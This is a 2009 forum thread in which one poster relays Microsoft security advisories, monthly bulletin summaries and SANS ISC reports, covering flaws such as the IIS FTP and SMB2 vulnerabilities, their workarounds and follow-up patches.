- http://www.microsoft.com/technet/security/advisory/973811.mspx
Published: August 11, 2009 - "Microsoft is announcing the availability of a new feature, Extended Protection for Authentication, on the Windows platform. This feature enhances the protection and handling of credentials when authenticating network connections using Integrated Windows Authentication (IWA). The update itself does not directly provide protection against specific attacks such as credential forwarding, but allows applications to opt-in to Extended Protection for Authentication. This advisory briefs developers and system administrators on this new functionality and how it can be deployed to help protect authentication credentials... Apply the updates associated with security bulletin MS09-042...
http://www.microsoft.com/technet/security/bulletin/ms09-042.mspx

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
Published: July 13, 2009 | Updated: August 11, 2009 - "... We have issued MS09-043* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx

.

AplusWebMaster
2009-08-18, 15:26
FYI...

- http://isc.sans.org/diary.html?storyid=6976
Last Updated: 2009-08-18 10:24:24 UTC - "... the MS09-039* vulnerability is actively exploited in the wild. To remind you, this vulnerability affects servers with the WINS service installed. The patch fixes two vulnerabilities. We do not have any technical information yet. However, the DShield graph shows a relatively high increase in targets for port 42 (see http://isc.sans.org/port.html?port=42 )... TCP port 42 is used for WINS replication..."
* http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx

:fear::fear:

AplusWebMaster
2009-08-28, 00:59
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V3.0 (August 25, 2009): Advisory revised to provide details about the Windows Live Messenger* 14.0.8089 release and to communicate the removal of the Windows Live Hotmail "Attach Photo" feature.

* http://download.live.com/messenger

:fear:

AplusWebMaster
2009-08-29, 19:24
FYI...

MSRT August Top Detection Reports
- http://blogs.technet.com/mmpc/archive/2009/08/27/msrt-august-top-detection-reports.aspx
August 27, 2009

:fear:

AplusWebMaster
2009-08-31, 23:36
FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
• V1.1 (August 25, 2009): Summary revised to notify users of an update to Autorun that restricts AutoPlay functionality to CD-ROM and DVD-ROM media, available for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 from Microsoft Knowledge Base Article 971029*.
* http://support.microsoft.com/kb/971029

:fear:

AplusWebMaster
2009-09-02, 05:36
FYI...

Microsoft Security Advisory (975191)
Vulnerability in Internet Information Services FTP Service Could Allow for Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975191.mspx
September 01, 2009 - "Microsoft is investigating new public reports of a vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, and Microsoft Internet Information Services (IIS) 6.0. The vulnerability could allow remote code execution on affected systems that are running the FTP service and are connected to the Internet. Microsoft is aware that detailed exploit code has been published on the Internet for this vulnerability. Microsoft is -not- currently aware of active attacks that use this exploit code or of customer impact at this time...
(See: )
Workarounds...
Additional Suggested Actions..."
* http://support.microsoft.com/kb/975191
September 2, 2009

> http://secunia.com/advisories/36443/2/
Release Date: 2009-09-01

- http://www.microsoft.com/technet/security/advisory/975191.mspx
"... Microsoft is currently aware of limited attacks that use this exploit code..."
Workarounds...
• Do not allow FTP write access to anonymous users...
• Do not allow FTP access to anonymous users...
• Modify NTFS file system permissions to disallow directory creation by FTP users...
• Upgrade to FTP Service 7.5 - FTP Service 7.5 is available for Windows Vista and Windows Server 2008. This version of FTP Service is not affected by the vulnerabilities in this advisory...
• Disable the FTP Service...
---
• V2.0 (September 3, 2009): Advisory revised to add CVE-2009-2521 and to provide more information on affected software, mitigations, and workarounds.

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3023
Last revised: 09/04/2009
CVSS v2 Base Score: 9.0 (HIGH)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2521
Last revised: 09/04/2009

:fear:

AplusWebMaster
2009-09-08, 20:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-sep.mspx
September 08, 2009 - "This bulletin summary lists security bulletins released for September 2009... security bulletins for this month in order of severity... (Total of -5-)

Critical -5-

Microsoft Security Bulletin MS09-045
Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961)
- http://www.microsoft.com/technet/security/bulletin/MS09-045.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-049
Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710)
- http://www.microsoft.com/technet/security/bulletin/MS09-049.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-047
Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812)
- http://www.microsoft.com/technet/security/bulletin/MS09-047.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-048
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (967723)
- http://www.microsoft.com/technet/security/bulletin/MS09-048.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-046
Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844)
- http://www.microsoft.com/technet/security/bulletin/MS09-046.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows
___

MS09-045 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1920
MS09-046 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2519
MS09-047 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2498
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2499
MS09-048 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4609
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1925
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1926
MS09-049 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1132
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7099
Last Updated: 2009-09-08 19:14:07 UTC
___

MS Severity and Exploitability Index
- http://blogs.technet.com/photos/msrcteam/images/3279846/original.aspx

MS Deployment Prioritization Assessment
- http://blogs.technet.com/photos/msrcteam/images/3279847/original.aspx

.

AplusWebMaster
2009-09-09, 05:41
FYI...

Vista/2008/Windows7 SMB2 BSOD 0-Day
- http://isc.sans.org/diary.html?storyid=7093
Last Updated: 2009-09-08 13:09:06 UTC - "... vulnerability affecting Microsoft SMB2* can be remotely crashed with proof-of-concept code that has been published yesterday and a Metasploit module is out. We have confirmed it affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled, with one packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall. Windows 2000/XP are NOT affected by this exploit..."
* http://en.wikipedia.org/wiki/Server_Message_Block#SMB2
___

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
September 08, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs...
Workarounds...
• Disable SMB v2... modify the registry key...
• Block TCP ports 139 and 445 at the firewall..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103
Last revised: 09/09/2009

- http://www.symantec.com/connect/blogs/bsod-and-possibly-more
September 15, 2009

:fear:

AplusWebMaster
2009-09-17, 12:41
FYI...

SMB2 remote exploit released
- http://isc.sans.org/diary.html?storyid=7141
Last Updated: 2009-09-16 21:15:36 UTC - "... 0-day vulnerability in SMB2 on Windows Vista and Server 2008 operating systems... Yesterday a well known security company added a module for their exploitation product. The module contains the remote exploit for this vulnerability – in other words, any user running this tool can get full access to affected machines. If the exploit is stable enough, it can _very easily_ be used in a worm, so it can potentially be devastating. So, if you are running a Windows Vista or Server 2008 machine (Windows 7 RTM is not affected, RC *is*), be sure you apply one of the workarounds listed by Microsoft (they are not perfect, but they can help), available here*..."
* http://www.microsoft.com/technet/security/advisory/975497.mspx

- http://www.theregister.co.uk/2009/09/16/windows_vista_exploit_released/
16 September 2009

:fear::mad::fear:

AplusWebMaster
2009-09-18, 01:18
FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
Updated: September 17, 2009 - "...Workarounds:
• Disable SMB v2... See Microsoft Knowledge Base Article 975497* to use the automated Microsoft Fix it solution to enable or disable this workaround...
* http://support.microsoft.com/kb/975497

• V1.1 (September 17, 2009): Clarified the FAQ, What is SMBv2? Added a link to Microsoft Knowledge Base Article 975497 to provide an automated Microsoft Fix it solution* for the workaround, Disable SMB v2...

- http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx
September 18, 2009

:fear:

AplusWebMaster
2009-09-24, 00:47
FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V1.2 (September 23, 2009): Clarified the FAQ, What is Server Message Block Version 2 (SMBv2)? Also clarified the impact of the workaround, Disable SMB v2.
(See: "Workarounds... Impact of Workaround...")
"... Some of the applications or services that could be impacted are listed..."

:fear:

AplusWebMaster
2009-09-29, 15:53
FYI...

Metasploit exploit module released
- http://www.symantec.com/security_response/threatconlearn.jsp
"... tracking a remotely exploitable vulnerability affecting the SMB kernel component ('srv2.sys'). Microsoft has reported that Windows Vista (SP1 and SP2) and Windows Server 2008 are affected. Reportedly, some beta builds of Windows 7 may also be affected.

On September 28, 2009, a remote code-execution exploit Metasploit module was released publicly. Attackers may be able to convert this module into other exploits and use it in the wild. We strongly advise users to block TCP port 445 immediately until patches are available. The researcher who discovered the flaw has stated that file sharing must be enabled for the issue to be exploited. Unless file sharing is explicitly required, users should disable it..."

:fear:

AplusWebMaster
2009-10-13, 20:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-oct.mspx
October 13, 2009 - "This bulletin summary lists security bulletins released for October 2009...
(Total of -13-)

Critical -8-

Microsoft Security Bulletin MS09-050
Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-051
Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682)
- http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-052
Vulnerability in Windows Media Player Could Allow Remote Code Execution (974112)
- http://www.microsoft.com/technet/security/bulletin/ms09-052.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-054
Cumulative Security Update for Internet Explorer (974455)
- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-055
Cumulative Security Update of ActiveX Kill Bits (973525)
- http://www.microsoft.com/technet/security/bulletin/ms09-055.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-060
Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution (973965)
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Microsoft Security Bulletin MS09-061
Vulnerabilities in the Microsoft .NET Common Language Runtime Could Allow Remote Code Execution (974378)
- http://www.microsoft.com/technet/security/bulletin/ms09-061.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework, Microsoft Silverlight

Microsoft Security Bulletin MS09-062
Vulnerabilities in GDI+ Could Allow Remote Code Execution (957488)
- http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Internet Explorer, Microsoft .NET Framework, Microsoft Office, Microsoft SQL Server, Microsoft Developer Tools, Microsoft Forefront

Important -5-

Microsoft Security Bulletin MS09-053
Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-056
Vulnerabilities in Windows CryptoAPI Could Allow Spoofing (974571)
- http://www.microsoft.com/technet/security/bulletin/ms09-056.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-057
Vulnerability in Indexing Service Could Allow Remote Code Execution (969059)
- http://www.microsoft.com/technet/security/bulletin/ms09-057.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-058
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (971486)
- http://www.microsoft.com/technet/security/bulletin/ms09-058.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-059
Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (975467)
- http://www.microsoft.com/technet/security/bulletin/ms09-059.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7345
Last Updated: 2009-10-13 21:08:21 UTC
___

Severity summary and exploitability index
- http://blogs.technet.com/photos/msrcteam/images/3286577/original.aspx
October 13, 2009

Deployment priority
- http://blogs.technet.com/photos/msrcteam/images/3286578/original.aspx
October 13, 2009
___

MSRT
- http://support.microsoft.com/?kbid=890830
October 13, 2009 - Revision: 65.0
(Recent additions)
Win32/FakeRean - August 2009 (V 2.13) - Moderate
Win32/Bredolab - September 2009 (V 2.14) - Moderate
Win32/Daurso - September 2009 (V 2.14) - Moderate
Win32/FakeScanti - October 2009 (V 3.0) - Moderate
- http://www.microsoft.com/security/malwareremove/families.aspx

//

AplusWebMaster
2009-10-14, 13:30
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V4.0 (October 13, 2009): Advisory revised to add an entry in the Updates related to ATL section to communicate the release of Microsoft Security Bulletin MS09-060, "Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution."
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx

Microsoft Security Advisory (975191)
Vulnerabilities in the FTP Service in Internet Information Services
- http://www.microsoft.com/technet/security/advisory/975191.mspx
• V3.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-053).
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V2.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-050).
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx

:fear:

AplusWebMaster
2009-10-14, 14:22
FYI...

Do NOT Apply MS09-056/KB974571 to LCS/OCS Servers
- http://blogs.technet.com/dodeitte/archive/2009/10/13/do-not-apply-kb974571-to-lcs-ocs-servers.aspx
October 13, 2009 11:04 PM - "Currently an issue is being observed after applying KB974571 (MS09-056: Vulnerabilities in CryptoAPI could allow spoofing) to LCS/OCS servers, that is causing them to believe that they are running an evaluation version of LCS/OCS and that it has expired..."
- http://support.microsoft.com/kb/974571/

:fear::fear:

AplusWebMaster
2009-10-16, 05:15
FYI...

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Updated: October 14, 2009 - "... Microsoft Security Bulletin MS09-054 contains a defense-in-depth, non-security update that enables WinINET to opt in to Extended Protection for Authentication.
• V1.1 (October 14, 2009): Updated the FAQ with information about a non-security update included in MS09-054* relating to WinINET.
* http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

:spider:

AplusWebMaster
2009-11-03, 14:48
FYI...

Update released for MS09-054
- http://blogs.technet.com/msrc/archive/2009/11/02/update-released-for-ms09-054.aspx
November 02, 2009 - "Today we released an update 976749 that addresses two issues with MS09-054 that a limited number of customers reported to us through our Customer Service and Support (CSS) group. These two issues can affect the proper display of web pages. For additional details, please refer to Microsoft Knowledge Base article 976749*. Security update MS09-054 was released as part of the October Security Bulletin Release cycle and protects against the vulnerabilities outlined in the bulletin. Also, we’re not currently aware of any attempts to attack the vulnerabilities. While the number of customers affected by these two issues is limited, after working both with affected customers and our CSS group, we feel the best thing for all customers is to proactively provide this update as widely as possible to help prevent other customers from encountering the issues outlined in the KB. Because of this, we plan to release this update through the same broad release channels as the original security update, MS09-054. Customers will see 976749 offered by default through Windows Update, Microsoft Update, and Automatic Updates. Customers who have applied MS09-054 should go ahead and apply 976749. Customers who have not yet applied MS09-054 should apply -both- MS09-054 and 976749..."
* http://support.microsoft.com/kb/976749
November 3, 2009 - Revision: 5.0 - "...Important: Do not install this update if you have not installed security update 974455. If you install this update without first installing security update 974455, Internet Explorer may not work correctly. If this occurs, uninstall this update, install security update 974455, and then reinstall this update..."

- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
• V2.0 (November 2, 2009): Revised to announce the availability of a hotfix to address application compatibility issues. Customers who have already applied this update may install the hotfix from Microsoft Knowledge Base Article 976749. Also corrected the log file names, spuninst folder names, and registry key values for Microsoft Windows 2000.

- http://secunia.com/advisories/36979/2/
Critical: Highly critical
2009-11-03: Updated "Solution" section as Microsoft issues an update to address certain problems introduced by the original patches. Added link in "Original Advisory" section.

:fear:

AplusWebMaster
2009-11-10, 20:50
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-nov.mspx
November 10, 2009 - "This bulletin summary lists security bulletins released for November 2009..." (Total of -6-)

Critical -3-

Microsoft Security Bulletin MS09-063 - Critical
Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)
- http://www.microsoft.com/technet/security/bulletin/ms09-063.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-064 - Critical
Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)
- http://www.microsoft.com/technet/security/bulletin/ms09-064.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-065 - Critical
Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)
- http://www.microsoft.com/technet/security/Bulletin/MS09-065.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Important -3-

Microsoft Security Bulletin MS09-066 - Important
Vulnerability in Active Directory Could Allow Denial of Service (973309)
- http://www.microsoft.com/technet/security/bulletin/ms09-066.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-067 - Important
Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)
- http://www.microsoft.com/technet/security/bulletin/MS09-067.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Microsoft Security Bulletin MS09-068 - Important
Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)
- http://www.microsoft.com/technet/security/bulletin/MS09-068.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7564
Last Updated: 2009-11-10 18:36:34 UTC
___

Severity summary and exploitability index
- http://blogs.technet.com/photos/msrcteam/images/3292868/original.aspx
November 10, 2009

Deployment priority
- http://blogs.technet.com/photos/msrcteam/images/3292871/original.aspx
November 10, 2009
___

MSRT
- http://support.microsoft.com/?kbid=890830
November 10, 2009 - Revision: 66.0
(Recent additions)
Win32/Bredolab - September 2009 (V 2.14) - Moderate
Win32/Daurso - September 2009 (V 2.14) - Moderate
Win32/FakeScanti - October 2009 (V 3.0) - Moderate
Win32/FakeVimes - November 2009 (V 3.1) - Moderate
Win32/PrivacyCenter - November 2009 (V 3.1) - Moderate

//

AplusWebMaster
2009-11-14, 04:50
FYI...

Microsoft Security Advisory (977544)
Vulnerability in SMB Could Allow Denial of Service
- http://www.microsoft.com/technet/security/advisory/977544.mspx
November 13, 2009 - "Microsoft is investigating new public reports of a possible denial of service vulnerability in the Server Message Block (SMB) protocol. This vulnerability cannot be used to take control of or install malicious software on a user’s system. However, Microsoft is aware that detailed exploit code has been published for the vulnerability. Microsoft is not currently aware of active attacks that use this exploit code or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs. Microsoft is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk. We continue to encourage responsible disclosure of vulnerabilities..."

- http://isc.sans.org/diary.html?storyid=7597
Last Updated: 2009-11-14 02:36:34 UTC - "... Assuming that you block TCP ports 139 and 445, the only impact would be an internal attacker could disable affected systems until restarted. In the grand scheme of things this would not be a critical issue unless all of a sudden your servers had to be rebooted on a regular basis, in that case you may have bigger problems because the fox would already be in the henhouse. The list of affected systems is: Windows 7 for 32-bit Systems, Windows 7 for x64-based Systems, Windows Server 2008 R2 for x64-based Systems (including Server Core), and Windows Server 2008 R2 for Itanium-based Systems..."

:clown: